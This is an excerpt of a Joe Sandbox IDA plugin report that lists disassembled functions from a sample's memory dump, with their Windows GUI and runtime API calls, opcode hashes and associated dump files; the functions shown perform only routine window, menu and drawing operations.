Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3H_prolog3_LockMetalstrlen
String ID:
API String ID: 3994854817-0
Opcode ID: 865f6dc339d8343c3c2e2b87a9bfb7fa58b5c1e3a6b55b2d13689af44ac24542
Instruction ID: 719cb9eac600bf5bed92f2fe3817dea68e266506d4f555f19542b8b9570f18cb
Opcode Fuzzy Hash: 865f6dc339d8343c3c2e2b87a9bfb7fa58b5c1e3a6b55b2d13689af44ac24542
Instruction Fuzzy Hash: 718159B1A00606AFDB249FA4CD89A6AFBF9FF48304710856AF556DB750E730EC51CB60

Function 00C510E4 Relevance: 13.7, APIs: 9, Instructions: 207COMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,00000000), ref: 00C5111C
RedrawWindow.USER32(?,?,00000000,00000105,?,?,?,?,00000000), ref: 00C51148
ClientToScreen.USER32(?,?), ref: 00C5117D
WindowFromPoint.USER32(?,?,?,?,?,?,00000000), ref: 00C51189
ReleaseCapture.USER32 ref: 00C511A1
SetCapture.USER32(?,?,?,?,?,00000000), ref: 00C51213
ReleaseCapture.USER32 ref: 00C51245
ClientToScreen.USER32(?,?), ref: 00C51333
SetCursorPos.USER32(?,?,?,?,?,?,00000000), ref: 00C5133F

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Capture$ClientReleaseScreenWindow$CursorFromPointRectRedraw
String ID:
API String ID: 2024412728-0
Opcode ID: 7810079238b290ea4a0a486e3740d0e9d0eb6eeadc6018153383e47b23548a32
Instruction ID: a6c0608b8c7e373d8ea2a97f95b64fdec8be8bd900011e785af42e78c8470cc5
Opcode Fuzzy Hash: 7810079238b290ea4a0a486e3740d0e9d0eb6eeadc6018153383e47b23548a32
Instruction Fuzzy Hash: 42818E34600A05DFCB21DF64C888AAEBBF5FF44311F14452AED6AC7260EB30AA84DF55

Function 00C23508 Relevance: 13.7, APIs: 9, Instructions: 189COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C2357B
InvalidateRect.USER32(?,?,00000001), ref: 00C235DE
InvalidateRect.USER32(?,?,00000001), ref: 00C235E9

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Invalidate$Empty
String ID:
API String ID: 1126320529-0
Opcode ID: c0f65de09d19181d609270d83b0e17104c44326f665b519ab84d5f137e9fef03
Instruction ID: 34f59b6433a96f59383d0ca8b65b170b1e2b3535ba806ee8ac21b8127401f5a4
Opcode Fuzzy Hash: c0f65de09d19181d609270d83b0e17104c44326f665b519ab84d5f137e9fef03
Instruction Fuzzy Hash: 47612871A00259AFCF11CF69D884AEE77B9FF49700F1540AAE819AB261D775AE40CF60

Function 00C03A8A Relevance: 13.7, APIs: 9, Instructions: 168windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C68E18: GetParent.USER32(?), ref: 00C68E24
Part of subcall function 00C68E18: GetParent.USER32(00000000), ref: 00C68E27

Part of subcall function 00BE240F: GetWindowLongA.USER32(?,000000F0), ref: 00BE241A

GetParent.USER32(?), ref: 00C03AEB
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00C03B00
GetClientRect.USER32(?,?), ref: 00C03B67
GetClientRect.USER32(?,?), ref: 00C03B7C

Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80A6
Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80B3

GetWindowRect.USER32(?,?), ref: 00C03B9C

Part of subcall function 00BE25F8: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,00BDE5B3,?,00BDE5B3,00000000,?,?,000000FF,000000FF,00000015), ref: 00BE2620

GetParent.USER32(?), ref: 00C03BEB
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00C03BFF
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C03C54
PostMessageA.USER32(?,00000000,00000000), ref: 00C03C76

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientMessageParent$RectSendWindow$Screen$LongPost
String ID:
API String ID: 3884207962-0
Opcode ID: 9779c85fce0f30d8fe425df808cab749d52b66f745ae0b4af1db3027cce98781
Instruction ID: 3accafac3724e2ab3f71352cc64a95950b2d02673aaaabfa9142bc31b8cd0b54
Opcode Fuzzy Hash: 9779c85fce0f30d8fe425df808cab749d52b66f745ae0b4af1db3027cce98781
Instruction Fuzzy Hash: E9611EB1900249AFCF10DFA9DC84AAEBBF9FF88300F104169E915EB261DB715A40DF60

Function 00BD8D84 Relevance: 13.7, APIs: 9, Instructions: 158windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00BD8DB2

Part of subcall function 00BF7A1D: GetClientRect.USER32(?,00BD8DDB), ref: 00BF7A4E
Part of subcall function 00BF7A1D: PtInRect.USER32(00BD8DDB,?,?), ref: 00BF7A68

ScreenToClient.USER32(?,?), ref: 00BD8E24
PtInRect.USER32(?,?,?), ref: 00BD8E34
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00BD8E60
GetParent.USER32(?), ref: 00BD8E7F
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00BD8EE8
GetFocus.USER32 ref: 00BD8EEE
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00BD8F2B
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00BD8F4F

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$Rect$Client$FocusParentScreenWindow
String ID:
API String ID: 4216724418-0
Opcode ID: 3778ff2bd2687e0c18d9af2392f12768d1e4b3fd477d05c2677c09f5af6b23c2
Instruction ID: 7f371a55b27cfe55a4d508647fe7367ad2db7011f59cdafcd7feb0bceb0825a7
Opcode Fuzzy Hash: 3778ff2bd2687e0c18d9af2392f12768d1e4b3fd477d05c2677c09f5af6b23c2
Instruction Fuzzy Hash: 0F517C75A00204EFDB21DFA5DD85A6EB7F9EB08706B5148AAF905DB361EB70ED008B50

Function 00C3CDE1 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CDE8
CreatePopupMenu.USER32 ref: 00C3CE1F
AppendMenuA.USER32(?,00000040,?,?), ref: 00C3CEBE
GetLastError.KERNEL32 ref: 00C3CEC8
AppendMenuA.USER32(?,00000040,?,?), ref: 00C3CF3A
GetLastError.KERNEL32 ref: 00C3CF42
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00C3CF63
GetLastError.KERNEL32 ref: 00C3CF6B
SetMenuDefaultItem.USER32(00000000,000000FF,00000000), ref: 00C3CFA8

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$AppendErrorLast$CreateDefaultH_prolog3ItemPopup
String ID:
API String ID: 1085244643-0
Opcode ID: e367395b46cfaf8f47e0ddad1b6c90c5e45f234f5b41a282ea15d88d2105ffe4
Instruction ID: e47781b640da48b293800d76ac276801b0a21b165b1b81fd79dc48b40b73cb66
Opcode Fuzzy Hash: e367395b46cfaf8f47e0ddad1b6c90c5e45f234f5b41a282ea15d88d2105ffe4
Instruction Fuzzy Hash: 7C51BF719106068FDF24DFA9CCC5BAEB7F1AF08310F140669E465B72A0DB309E01DB95

Function 00BEEAEA Relevance: 13.6, APIs: 9, Instructions: 129windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,0000420F,00000001), ref: 00BEEB3E
EnableMenuItem.USER32(?,0000420E,00000001), ref: 00BEEB5A
CheckMenuItem.USER32(?,00004213,00000008), ref: 00BEEB8F
EnableMenuItem.USER32(?,00004212,00000001), ref: 00BEEBAF
EnableMenuItem.USER32(?,00004212,00000001), ref: 00BEEBD3
EnableMenuItem.USER32(?,00004213,00000001), ref: 00BEEBDF
EnableMenuItem.USER32(?,00004214,00000001), ref: 00BEEBEB
EnableMenuItem.USER32(?,00004215,00000001), ref: 00BEEC33
CheckMenuItem.USER32(?,00004215,00000008), ref: 00BEEC47

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ItemMenu$Enable$Check
String ID:
API String ID: 1852492618-0
Opcode ID: 47e098c9888dd8cba61ea2727083827c3f15a56a7460c7f4819f76aedcbf4bbc
Instruction ID: 279480fb50d81f8370c7a6fe1c2bb30d2ce37ecf0344f845732c646f4aa9b6c2
Opcode Fuzzy Hash: 47e098c9888dd8cba61ea2727083827c3f15a56a7460c7f4819f76aedcbf4bbc
Instruction Fuzzy Hash: C941AE70740251EBDB209F26CDC6F15BBE5EB14714F1482E5FA26AE2E5D7B0EC80DA90

Function 00BE3672 Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00BE3679
EnterCriticalSection.KERNEL32(?,00000010,00BE391A,?,00000000,?,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE368A
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE36A8
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE36DC
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE3748
_memset.LIBCMT ref: 00BE3767
TlsSetValue.KERNEL32(?,00000000), ref: 00BE3778
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE3799

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: ff7315320033cffa3c642b7c2cc7fbe4f467a5aa71887634173ff31d915dcc5f
Instruction ID: 8d5561c6d01a5a1259e7f49c8e35e8c86478cfcb559b2444ab8a8657605b2cff
Opcode Fuzzy Hash: ff7315320033cffa3c642b7c2cc7fbe4f467a5aa71887634173ff31d915dcc5f
Instruction Fuzzy Hash: 973170F1400685AFCB11AF65D8C9E6EBBF1EF04710B20C5ADE51697660CB30AE50DF91

Function 00C2DCF6 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 387COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C2DCFD

Part of subcall function 00BE02A9: GetWindowTextLengthA.USER32(?), ref: 00BE02BA
Part of subcall function 00BE02A9: GetWindowTextA.USER32(?,00000000,00000001), ref: 00BE02D1

InflateRect.USER32(?,?,?), ref: 00C2DE1A
SetRectEmpty.USER32(?), ref: 00C2DE26
InflateRect.USER32(?,00000000,00000000), ref: 00C2DEB7
OffsetRect.USER32(?,00000001,00000001), ref: 00C2DF44
IsRectEmpty.USER32(?), ref: 00C2DFD1

Strings

mmm, xrefs: 00C2DF65

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$EmptyInflateTextWindow$H_prolog3_LengthOffset
String ID: mmm
API String ID: 2648887860-1545505134
Opcode ID: 306bd3c90f88bdce7557a3d4ebb0db5b0957b18bea4c6b8b779497fa52d9709b
Instruction ID: 288cebe0a50f29b600d829b3259b211e5ecc5abec125daf8ebe7ef3367de3004
Opcode Fuzzy Hash: 306bd3c90f88bdce7557a3d4ebb0db5b0957b18bea4c6b8b779497fa52d9709b
Instruction Fuzzy Hash: 4EE16D30900619DFCF15CFA8D884AEEBBB5FF48300F184179E816AF655DB70AA45DB21

Function 00BD60F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD6047: GetParent.USER32(?), ref: 00BD609B
Part of subcall function 00BD6047: GetLastActivePopup.USER32(?), ref: 00BD60AC
Part of subcall function 00BD6047: IsWindowEnabled.USER32(?), ref: 00BD60C0
Part of subcall function 00BD6047: EnableWindow.USER32(?,00000000), ref: 00BD60D3

EnableWindow.USER32(?,00000001), ref: 00BD6146
GetWindowThreadProcessId.USER32(?,?), ref: 00BD615A
GetCurrentProcessId.KERNEL32 ref: 00BD6164
SendMessageA.USER32(?,00000376,00000000,00000000), ref: 00BD617C
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00BD61F6
EnableWindow.USER32(00000000,00000001), ref: 00BD623B

Strings

0, xrefs: 00BD61D1

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: 656bc0a21ecd5c0f80aa8ecbddbe8f348d4452fb950a8e8fd23bf0624259d643
Instruction ID: dae1f301d1d77e860c3f0ba8524e09d3a7ac87fe36561623870be5128ffcb224
Opcode Fuzzy Hash: 656bc0a21ecd5c0f80aa8ecbddbe8f348d4452fb950a8e8fd23bf0624259d643
Instruction Fuzzy Hash: 85418E71A00359ABDB259F24CC86BDAB7F4EB09710F1401D6F955A6391E7B1AE80CF90

Function 00C21961 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100windowmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C21968
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,00000078,00C21C4E,?,00C21CCC), ref: 00C2198B

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

SHGetDesktopFolder.SHELL32(?,?,00C21CCC), ref: 00C219A0
GlobalAlloc.KERNEL32(00000040,0000000C,?,00C21CCC), ref: 00C219B5
SendMessageA.USER32(?,00001100,00000000,?), ref: 00C21A5E
SendMessageA.USER32(?,00001102,00000002,00000000), ref: 00C21A6B

Strings

g, xrefs: 00C219AE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: FolderH_prolog3MessageSend$AllocDesktopException@8GlobalLocationSpecialThrow
String ID: g
API String ID: 2027722222-30677878
Opcode ID: 525747f71555e457b2817be24c30fbe3a1880542245238a92f14b221d5cbc06d
Instruction ID: 1dcd819e7b51c52521c80ba3a00ea40fa04bc8ff9a4d397211f63f7337334eda
Opcode Fuzzy Hash: 525747f71555e457b2817be24c30fbe3a1880542245238a92f14b221d5cbc06d
Instruction Fuzzy Hash: 51316B71A002299FCB10EFA4CC89BAEBBF9FF49300F054569F915EB291DB709941CB60

Function 00C221A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000004,?), ref: 00C221EF
_memset.LIBCMT ref: 00C221FC
SendMessageA.USER32(?,00001102,00008001,?), ref: 00C22265

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00C2222E
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00C22239
SendMessageA.USER32(?,0000110B,00000009,?), ref: 00C22253

Strings

@, xrefs: 00C2220D

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$Exception@8H_prolog3Throw_memset
String ID: @
API String ID: 3199205413-2766056989
Opcode ID: 63cf4ecceb1caa8b7358753c37bcb17c668c2cf39217881ced5f5f80880d824d
Instruction ID: 6fd26cde55f58295e62a3f1b49608b4caf27d60d4b88f353a3f05a2459e0f5b5
Opcode Fuzzy Hash: 63cf4ecceb1caa8b7358753c37bcb17c668c2cf39217881ced5f5f80880d824d
Instruction Fuzzy Hash: 30219272640308BFEB219B55EC81FEA7BB8FB58760F104015FA44AA5A1E6B1ED508B60

Function 00C22EAA Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C22EB4

Part of subcall function 00BE7E5C: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BE7E65

SendMessageA.USER32(FFFFFFFF,00000030,?,00000001), ref: 00C22F20
SendMessageA.USER32(FFFFFFFF,000000D4,00000000,00000000), ref: 00C22F2D
SendMessageA.USER32(FFFFFFFF,00000030,?,00000001), ref: 00C22F4D
SendMessageA.USER32(FFFFFFFF,000000D4,00000000,00000000), ref: 00C22F57
~_Task_impl.LIBCPMT ref: 00C22F77

Strings

d, xrefs: 00C22EED

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$H_prolog3_Task_impl
String ID: d
API String ID: 731318678-2564639436
Opcode ID: 4b3cb07779c51ceda78ea6863d0d5478d8951e3486a48a7836a2db1024a38804
Instruction ID: db5701b100f9e1c41183d1e3b13513e3333d247d035e9945379506740132a4db
Opcode Fuzzy Hash: 4b3cb07779c51ceda78ea6863d0d5478d8951e3486a48a7836a2db1024a38804
Instruction Fuzzy Hash: 4A215170900229AEEF21DFA1CD82FADBAB8FB04314F5041AAB215A71D1DB705F45DF54

Function 00BF0358 Relevance: 12.3, APIs: 8, Instructions: 309timewindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BF035F
SetCursor.USER32(00000040,00BF0AEE,00000000,00000000,?), ref: 00BF03F9

Part of subcall function 00BD82B9: __EH_prolog3.LIBCMT ref: 00BD82C0
Part of subcall function 00BD82B9: GetDC.USER32(00000000), ref: 00BD82EC

Part of subcall function 00BEAB06: __EH_prolog3_GS.LIBCMT ref: 00BEAB0D
Part of subcall function 00BEAB06: CreateRectRgnIndirect.GDI32(?), ref: 00BEAB4A
Part of subcall function 00BEAB06: CopyRect.USER32(?,?), ref: 00BEAB60
Part of subcall function 00BEAB06: InflateRect.USER32(?,?,?), ref: 00BEAB76
Part of subcall function 00BEAB06: IntersectRect.USER32(?,?,?), ref: 00BEAB84
Part of subcall function 00BEAB06: CreateRectRgnIndirect.GDI32(?), ref: 00BEAB8E
Part of subcall function 00BEAB06: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BEABA3
Part of subcall function 00BEAB06: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BEAC0B

Part of subcall function 00BD830D: __EH_prolog3.LIBCMT ref: 00BD8314
Part of subcall function 00BD830D: ReleaseDC.USER32(?,00000000), ref: 00BD8331

GetFocus.USER32 ref: 00BF0498
SetTimer.USER32(?,00000014,000001F4,00000000), ref: 00BF0558
SendMessageA.USER32(?,00000362,0000E001,00000000), ref: 00BF05FD
KillTimer.USER32(?,00000014), ref: 00BF0729
SetTimer.USER32(?,00000014,000001F4,00000000), ref: 00BF0746
UpdateWindow.USER32(?), ref: 00BF0765

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Create$Timer$H_prolog3H_prolog3_Indirect$CopyCursorFocusInflateIntersectKillMessageReleaseSendUpdateWindow
String ID:
API String ID: 2399994607-0
Opcode ID: f126bf4ec317eae6a1651714d599db46593bfb5482b2f3596b7281db0b2e0793
Instruction ID: a4ba4ae891b253c76bc25c74b49f0d60783a3b0292498483af33799a9f61a25a
Opcode Fuzzy Hash: f126bf4ec317eae6a1651714d599db46593bfb5482b2f3596b7281db0b2e0793
Instruction Fuzzy Hash: 3BC12D705102089FDF24AF24C8D5BA977E5EB44325F1442B9FA199F2A6DB709C89CF60

Function 00CC2067 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC2089
_strlen.LIBCMT ref: 00CC208F
_strcpy_s.LIBCMT ref: 00CC20A8
GetDC.USER32(00000000), ref: 00CC20BE
EnumFontFamiliesExA.GDI32(00000000,?,00CC2025,?,00000000), ref: 00CC20D9
ReleaseDC.USER32(00000000,00000000), ref: 00CC20E1

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Strings

MS UI Gothic, xrefs: 00CC208E, 00CC20A1

Memory Dump Source

